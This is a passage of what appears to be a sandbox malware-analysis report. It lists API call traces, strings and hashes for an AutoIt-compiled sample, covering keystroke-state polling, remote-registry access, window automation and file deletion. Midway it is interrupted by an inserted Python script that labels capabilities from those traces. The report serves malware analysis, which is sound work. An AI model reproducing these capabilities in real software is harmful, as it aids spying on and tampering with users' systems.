                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 1411258926-22481851
                                        • Opcode ID: eba560de4fbdee5e5027ad88e5245b729191f64e9517fa380eb5e381e4aefd53
                                        • Instruction ID: 06dbb2362d33949ba22b942c59872d9bd412ee41bafbdaa483700db19fcf5a4d
                                        • Opcode Fuzzy Hash: eba560de4fbdee5e5027ad88e5245b729191f64e9517fa380eb5e381e4aefd53
                                        • Instruction Fuzzy Hash: 7A411876C1022DEACF25EBA4DC99DEEB778FF04740F408129E915A2161EB789E14CF50
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D2AA6,?,?), ref: 007D3B0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                        • API String ID: 3964851224-909552448
                                        • Opcode ID: 569dadf3691ae1d75f323303453feac12792a75af2813c925ce509ac10f004c6
                                        • Instruction ID: e37da700834600902a874c5a2d350fb5c52b021bd5a8364c04a9ec8b7a5aa460
                                        • Opcode Fuzzy Hash: 569dadf3691ae1d75f323303453feac12792a75af2813c925ce509ac10f004c6
                                        • Instruction Fuzzy Hash: C3419E3416024ACBDF04EF44E844AEA3361FF25390F144826ECA59B395DB789E59CB72
                                        APIs
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007B843F
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007B8455
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007B8466
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007B8478
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007B8489
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: SendString$_memmove
                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 2279737902-1007645807
                                        • Opcode ID: ccaddbaf87011c16241f340e5806925a72d5e07cf8fd6308270584708aca9537
                                        • Instruction ID: 4dacf0122d148039d463213e9cb6d869509c7bad1e27923bb91f8713fdedee17
                                        • Opcode Fuzzy Hash: ccaddbaf87011c16241f340e5806925a72d5e07cf8fd6308270584708aca9537
                                        • Instruction Fuzzy Hash: 0C11C8616401ADB9DB20A7A1DC5EEFF7B7CFB91B40F404429B421E21D0DEAC5E44C5B1
                                        APIs
                                        • timeGetTime.WINMM ref: 007B809C
                                          • Part of subcall function 0078E3A5: timeGetTime.WINMM(?,7694B400,007E6163), ref: 0078E3A9
                                        • Sleep.KERNEL32(0000000A), ref: 007B80C8
                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 007B80EC
                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 007B810E
                                        • SetActiveWindow.USER32 ref: 007B812D
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007B813B
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 007B815A
                                        • Sleep.KERNEL32(000000FA), ref: 007B8165
                                        • IsWindow.USER32 ref: 007B8171
                                        • EndDialog.USER32(00000000), ref: 007B8182
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: BUTTON
                                        • API String ID: 1194449130-3405671355
                                        • Opcode ID: 5d21b532179e411509b9588a6b4791cacb89345fafc79dda54d161b7b2d4086c
                                        • Instruction ID: f39ab982d022d6fd0a9b6382e739048689855eecbf13f995b596460f4c346099
                                        • Opcode Fuzzy Hash: 5d21b532179e411509b9588a6b4791cacb89345fafc79dda54d161b7b2d4086c
                                        • Instruction Fuzzy Hash: 0B218170200208FFE7226B65EC8DB7A3B6FF7A4389B044518F51182261CF7E8D55CB1A
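The API chains listed for the functions above (the GDI screen-capture sequence, the DACL edit on a user object, the remote-registry connection, the window-automation loop) are what an analyst uses to map a function to a capability. The following Python script is added here as an example and is not part of the Joe Sandbox report or of the analysed sample: it parses "APIs" blocks in the line format used on this page and labels each block from a hand-written set of API-set signatures. The signature sets, the label names and the sample excerpt embedded in it are assumptions chosen for illustration.

```python
"""Label Joe Sandbox IDA-plugin "APIs" blocks with a capability from their API set.

Added example, not code from the Joe Sandbox report or the analysed sample.
SIGNATURES, the label names and SAMPLE_REPORT are assumptions for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: str
    ref: str
    from_subcall: bool   # listed as "Part of subcall function ..."


# One line of an "APIs" block: "• GetDIBits.GDI32(00000006,?,...), ref: 007CA392"
# or, without an argument list, "• _memset.LIBCMT ref: 007AB60C".
API_LINE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Assumed signatures: every API in the set must appear in the block.
SIGNATURES = {
    "screen-capture": frozenset({"GetDC", "CreateCompatibleBitmap", "StretchBlt", "GetDIBits"}),
    "desktop-dacl-tamper": frozenset({"GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity"}),
    "remote-registry": frozenset({"WNetAddConnection2W", "RegConnectRegistryW", "RegOpenKeyExW"}),
    "window-automation": frozenset({"EnumThreadWindows", "FindWindowExW", "SendMessageW"}),
}

BLOCK_END = {"Strings", "Memory Dump Source"}   # headers that follow an "APIs" list


def parse_blocks(report: str, direct_only: bool = False) -> list[dict]:
    """Return one dict per "APIs" block: its ApiCalls and the matched capability labels.

    With direct_only=True, APIs that only appear on "Part of subcall function" lines
    are ignored when matching, so a label needs every call made by the function itself.
    """
    blocks: list[dict] = []
    calls: list[ApiCall] | None = None
    for raw in report.splitlines():
        line = raw.strip()
        if line == "APIs":
            calls = []                      # a new function block starts
            blocks.append({"calls": calls})
            continue
        if calls is None:
            continue
        if line in BLOCK_END:
            calls = None                    # the API list for this block is over
            continue
        m = API_LINE.match(line)
        if m:
            calls.append(ApiCall(m["api"], m["module"], m["args"] or "",
                                 m["ref"], m["sub"] is not None))
    for block in blocks:
        names = {c.api for c in block["calls"] if not (direct_only and c.from_subcall)}
        block["capabilities"] = sorted(
            label for label, sig in SIGNATURES.items() if sig <= names)
    return blocks


# Constructed excerpt in the page's format: a screen-capture function, then a
# DACL-editing function whose GetUserObjectSecurity call sits in a subcall.
SAMPLE_REPORT = """
APIs
• GetDC.USER32(00000000), ref: 007CA2DD
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007CA2E9
• CreateCompatibleDC.GDI32(?), ref: 007CA2F5
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007CA356
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007CA3B6
• ReleaseDC.USER32(00000000,?), ref: 007CA3D9
Strings
Memory Dump Source
APIs
  • Part of subcall function 007AB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007AB903
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007AB5F7
• _memset.LIBCMT ref: 007AB60C
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007AB695
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007AB747
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 007AB75B
Memory Dump Source
"""

if __name__ == "__main__":
    for block in parse_blocks(SAMPLE_REPORT):
        first = block["calls"][0].ref if block["calls"] else "?"
        print(f"function with first call at {first}: "
              f"{', '.join(block['capabilities']) or 'no signature match'}")
```

Entries flagged "Part of subcall function" are calls made by a callee, so a label that only matches with them included is weaker evidence than one matching on the function's own calls; direct_only=True makes that distinction explicit, and on the sample above it drops the DACL label because GetUserObjectSecurity is only reached through the subcall. The signatures require the full API set, so a function that calls GetDC and StretchBlt but never GetDIBits is not labelled; loosen this to a threshold if the report you are triaging splits one capability across several functions.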
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007E3C64,00000010,00000000,Bad directive syntax error,0080DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 007B32D1
                                        • LoadStringW.USER32(00000000,?,007E3C64,00000010), ref: 007B32D8
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • _wprintf.LIBCMT ref: 007B3309
                                        • __swprintf.LIBCMT ref: 007B332B
                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007B3395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                        • API String ID: 1506413516-4153970271
                                        • Opcode ID: efb62aa98633f7e65adae52ec8c98d4d287a6772b6113d4c935ecbe9e82fa148
                                        • Instruction ID: 530543139c00f6c4d8cb911f85b0b2a0c8115a72f0f7bb5efc9f60ecaa9e5d45
                                        • Opcode Fuzzy Hash: efb62aa98633f7e65adae52ec8c98d4d287a6772b6113d4c935ecbe9e82fa148
                                        • Instruction Fuzzy Hash: 8E217C3284421AFBCF12EF90DC1AEEE7775FF18740F008415B519A11A2DA7DAB94DB60
                                        APIs
                                          • Part of subcall function 007BC6A0: __time64.LIBCMT ref: 007BC6AA
                                          • Part of subcall function 007741A7: _fseek.LIBCMT ref: 007741BF
                                        • __wsplitpath.LIBCMT ref: 007BC96F
                                          • Part of subcall function 0079297D: __wsplitpath_helper.LIBCMT ref: 007929BD
                                        • _wcscpy.LIBCMT ref: 007BC982
                                        • _wcscat.LIBCMT ref: 007BC995
                                        • __wsplitpath.LIBCMT ref: 007BC9BA
                                        • _wcscat.LIBCMT ref: 007BC9D0
                                        • _wcscat.LIBCMT ref: 007BC9E3
                                          • Part of subcall function 007BC6E4: _memmove.LIBCMT ref: 007BC71D
                                          • Part of subcall function 007BC6E4: _memmove.LIBCMT ref: 007BC72C
                                        • _wcscmp.LIBCMT ref: 007BC92A
                                          • Part of subcall function 007BCE59: _wcscmp.LIBCMT ref: 007BCF49
                                          • Part of subcall function 007BCE59: _wcscmp.LIBCMT ref: 007BCF5C
                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007BCB8D
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007BCC24
                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007BCC3A
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007BCC4B
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007BCC5D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                        • String ID:
                                        • API String ID: 152968663-0
                                        • Opcode ID: 817f68c25e0311e8b1eb7068da6f962bf7ae13c299e17c4f4212d310ce148e2e
                                        • Instruction ID: b587d9db2996604d58ac50928c31a294f8cced54a25ce0c45ff572b322e9fdf2
                                        • Opcode Fuzzy Hash: 817f68c25e0311e8b1eb7068da6f962bf7ae13c299e17c4f4212d310ce148e2e
                                        • Instruction Fuzzy Hash: 79C13BB190011DAEDF11DFA4CC85EEEBBBDAF59310F0080AAF609E6151D7789A84CF65
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                        • String ID:
                                        • API String ID: 3566271842-0
                                        • Opcode ID: 31518a075f413ed3d494db8126b46988535073a74245fbd92bb761bc68bd6693
                                        • Instruction ID: 50f9823b6a6639a3960858924925eb2931079b2d5788e6880bd09a1af9a7be97
                                        • Opcode Fuzzy Hash: 31518a075f413ed3d494db8126b46988535073a74245fbd92bb761bc68bd6693
                                        • Instruction Fuzzy Hash: 54711B75A00219EFDB10DFA4C888EDEB7B9FF48354F048099E919AB251D778AE40CB94
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 007B3908
                                        • SetKeyboardState.USER32(?), ref: 007B3973
                                        • GetAsyncKeyState.USER32(000000A0), ref: 007B3993
                                        • GetKeyState.USER32(000000A0), ref: 007B39AA
                                        • GetAsyncKeyState.USER32(000000A1), ref: 007B39D9
                                        • GetKeyState.USER32(000000A1), ref: 007B39EA
                                        • GetAsyncKeyState.USER32(00000011), ref: 007B3A16
                                        • GetKeyState.USER32(00000011), ref: 007B3A24
                                        • GetAsyncKeyState.USER32(00000012), ref: 007B3A4D
                                        • GetKeyState.USER32(00000012), ref: 007B3A5B
                                        • GetAsyncKeyState.USER32(0000005B), ref: 007B3A84
                                        • GetKeyState.USER32(0000005B), ref: 007B3A92
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 0b74ead2873a4b50c408e95dfd126528ca0f5f63b402224da9e1261eb73a1b8a
                                        • Instruction ID: ee3c7ac16eee9a4a0bcc760fc44ace62abfe1711c6d8fa12ee747765d829c571
                                        • Opcode Fuzzy Hash: 0b74ead2873a4b50c408e95dfd126528ca0f5f63b402224da9e1261eb73a1b8a
                                        • Instruction Fuzzy Hash: 8E51F720A047C469FB35EBA488157EABFB45F01740F08858DE5C25A1C3DA5CABCCC772
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 007AFB19
                                        • GetWindowRect.USER32(00000000,?), ref: 007AFB2B
                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007AFB89
                                        • GetDlgItem.USER32(?,00000002), ref: 007AFB94
                                        • GetWindowRect.USER32(00000000,?), ref: 007AFBA6
                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007AFBFC
                                        • GetDlgItem.USER32(?,000003E9), ref: 007AFC0A
                                        • GetWindowRect.USER32(00000000,?), ref: 007AFC1B
                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007AFC5E
                                        • GetDlgItem.USER32(?,000003EA), ref: 007AFC6C
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007AFC89
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 007AFC96
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: cc8439700f8d1f39ef106d73e77880b339cf6d9e3bb602229b9586df8a4efda4
                                        • Instruction ID: b1e5e8cb11daf42294d9ab7affb3dd03fde129112b3d8e142ae0321f8e762092
                                        • Opcode Fuzzy Hash: cc8439700f8d1f39ef106d73e77880b339cf6d9e3bb602229b9586df8a4efda4
                                        • Instruction Fuzzy Hash: F45120B1B00209AFDB18CFA9DD95ABEBBB6EB88351F148229F915D7290D7749D00CB14
                                        APIs
                                          • Part of subcall function 0078B155: GetWindowLongW.USER32(?,000000EB), ref: 0078B166
                                        • GetSysColor.USER32(0000000F), ref: 0078B067
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: be84e06afef0e3dbe2b95af7f6ed6a14d5a28cfb7e04e2f2d2605e04ba979bb9
                                        • Instruction ID: b753aabe8f452c8e904b272775f42f136f93d2fa7cdd0142f3f8f8bad27e43e3
                                        • Opcode Fuzzy Hash: be84e06afef0e3dbe2b95af7f6ed6a14d5a28cfb7e04e2f2d2605e04ba979bb9
                                        • Instruction Fuzzy Hash: 2C41A031140548AFDB30AF28DC88BBA3B66AB46731F188265FD758F1E2D7398C41DB25
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                        • String ID:
                                        • API String ID: 136442275-0
                                        • Opcode ID: 79ef8f11be5dbe3a1c5934ed5d57f7a77a5049f6b4bce5060278283f6246b1b6
                                        • Instruction ID: bea29ae2dcf632e7710470ac65920af9867f1465eeb56e155027b201ba218cbf
                                        • Opcode Fuzzy Hash: 79ef8f11be5dbe3a1c5934ed5d57f7a77a5049f6b4bce5060278283f6246b1b6
                                        • Instruction Fuzzy Hash: 7F410EB290416CAADF25EB50DC45EDE73BCAB48310F4041E6B519A2041EB79ABD4CFA0
                                        APIs
                                        • __swprintf.LIBCMT ref: 007784E5
                                        • __itow.LIBCMT ref: 00778519
                                          • Part of subcall function 00792177: _xtow@16.LIBCMT ref: 00792198
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __itow__swprintf_xtow@16
                                        • String ID: %.15g$0x%p$False$True
                                        • API String ID: 1502193981-2263619337
                                        • Opcode ID: 6a51bbfbe0c67b796cc97e629d4173f4aaeb6e8e674fd9bfe23e8f617259d7d0
                                        • Instruction ID: 70f63028b55b8981e07701f85f34a1a1876bec0b1f5776d49b65fc1d555037d7
                                        • Opcode Fuzzy Hash: 6a51bbfbe0c67b796cc97e629d4173f4aaeb6e8e674fd9bfe23e8f617259d7d0
                                        • Instruction Fuzzy Hash: 3A413631600649EFDF24DF38E849E6A77E9FF09350F20846EE449C7282EA7D9A51CB11
                                        APIs
                                        • _memset.LIBCMT ref: 007B5816
                                        • GetMenuItemInfoW.USER32(008318F0,000000FF,00000000,00000030), ref: 007B5877
                                        • SetMenuItemInfoW.USER32(008318F0,00000004,00000000,00000030), ref: 007B58AD
                                        • Sleep.KERNEL32(000001F4), ref: 007B58BF
                                        • GetMenuItemCount.USER32(?), ref: 007B5903
                                        • GetMenuItemID.USER32(?,00000000), ref: 007B591F
                                        • GetMenuItemID.USER32(?,-00000001), ref: 007B5949
                                        • GetMenuItemID.USER32(?,?), ref: 007B598E
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007B59D4
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B59E8
                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B5A09
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
